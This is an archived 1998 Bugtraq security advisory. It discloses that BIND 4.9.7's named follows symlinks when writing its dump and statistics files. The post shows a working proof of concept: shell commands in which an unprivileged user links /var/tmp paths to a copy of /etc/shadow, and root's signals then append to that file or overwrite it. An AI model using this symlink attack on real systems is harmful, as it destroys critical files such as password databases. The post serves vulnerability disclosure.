BIND 4.9.7 named follows symlinks, clobbers anything.

From: Joe (joeat_private)
Date: Fri Apr 10 1998 - 13:29:20 PDT

Next message: Greg Alexander: "Linux libc5.4.33 dumbness w/ mk[s]temp()"

Previous message: Ken Williams: "announce: weaken for netscape !! (fwd)"
Next in thread: Paul A Vixie: "Re: BIND 4.9.7 named follows symlinks, clobbers anything."
Reply: Paul A Vixie: "Re: BIND 4.9.7 named follows symlinks, clobbers anything."
Reply: Mark.Andrewsat_private: "Re: BIND 4.9.7 named follows symlinks, clobbers anything."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[ Posted to BUGTRAQ and comp.protocols.dns.bind ]
[ Standard apologies if this is already known - a search on the Bugtraq
  archive and Deja News comp.protocols.dns.bind doesn't indicate it.]

The new named(8) happily follows symlinks and clobbers any file on the
system when it receives a SIGINT. (Used for debugging and statistics
gathering) SIGINT dumps the named database to /var/tmp/named_dump.db

It will also happily append data to any system file when it receives a
SIGIOT. SIGIOT appends named statistics to /var/tmp/named.stats.

This problem is probably recursive to previous versions of named but since
I've already replaced mine I can't confirm that.

On Wed, 8 Apr 1998, Aleph One wrote:

[Snippage of the latest CERT]

>      (Note: the in.named(8) man page mentions that sending a SIGINT to the
>      in.named process will dump the current data base and cache to, by
>      default, /var/tmp/named_dump.db. Some sites may find this useful in
>      looking for self-referential CNAMEs.  Please see the in.named(8) man
>      page for further details.)

This caught my eye in that CERT advisory and after updating my BIND to the
new 4.9.7 ( RedHat 4.2 Linux 2.0.30 i586 ) and reading through the
named(8) man pages I ran a quick check.

[root]# cp /etc/shadow /etc/junk.shadow
[root]# ls -l /etc/junk.shadow
-r--------   1 root     root          992 Apr 10 12:52 junk.shadow

Now as a non-priv user..

[Luser]# ln -s /etc/junk.shadow /var/tmp/named_dump.db
[Luser]# ln -s /etc/junk.shadow /var/tmp/named.stats
[Luser]# logout

(Now if ever root sends a SIGINT or SIGIOT /etc/junk.shadow is toast...)

[root]# kill -SIGIOT [named.pid]

[root]# ls -al /etc/junk.shadow
-r--------   1 root     root         2251 Apr 10 13:00 /etc/junk.shadow

[root]# less /etc/junk.shadow

        someusrr:[removed of course]:10311:-1:-1:-1:-1:-1:-1
        nothrusr:[removed of course]:10316:-1:-1:-1:-1:-1:-1
        +++ Statistics Dump +++ (892238406) Fri Apr 10 13:00:06 1998
        2368    time since boot (secs)
        2368    time since reset (secs)
        0       Unknown query types
<SNIP>

The statistics dump gets appended to any file on the system.

Now for the real horror -

[root]# kill -SIGINT [named.pid]
[root]# ls -l /etc/junk.shadow
-r--------   1 root     root         5249 Apr 10 13:02 /etc/junk.shadow
[root]# less /etc/junk.shadow

        ; Dumped at Fri Apr 10 13:02:40 1998
        ;; ++zone table++
        <SNIP>

No trace of the original remains. Your shadow password file or anything
else on the system is fried.

Enjoy.

--
Joe H.                                  Technical Support
General Support:  supportat_private     Blarg! Online Services, Inc.
Voice:  425/401-9821 or 888/66-BLARG    http://www.blarg.net

Next message: Greg Alexander: "Linux libc5.4.33 dumbness w/ mk[s]temp()"
Previous message: Ken Williams: "announce: weaken for netscape !! (fwd)"
Next in thread: Paul A Vixie: "Re: BIND 4.9.7 named follows symlinks, clobbers anything."
Reply: Paul A Vixie: "Re: BIND 4.9.7 named follows symlinks, clobbers anything."
Reply: Mark.Andrewsat_private: "Re: BIND 4.9.7 named follows symlinks, clobbers anything."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:48:55 PDT